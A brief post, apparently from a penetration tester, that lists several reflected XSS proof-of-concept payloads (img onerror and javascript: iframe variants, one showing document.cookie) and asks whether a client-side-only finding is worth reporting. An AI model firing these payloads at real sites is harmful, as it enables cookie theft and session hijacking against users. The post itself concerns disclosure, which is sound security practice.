Found Reflected XSS

While performing a penetration test, I discovered some reflected XSS using the following payloads:

<img src="x" onerror="alert(1)"> <img src="x" onerror="alert(document.cookie);"> <img src="x" onerror="alert('User agent: ' + navigator.userAgent);"> <iframe src="javascript:alert('iframe XSS')"></iframe> <img src="x" onerror="alert(window.location.href)"> <iframe src="x" fetch=("http://localhost/script.html")></iframe>

Should I report this vulnerability, or skip it since its impact is limited to the client side?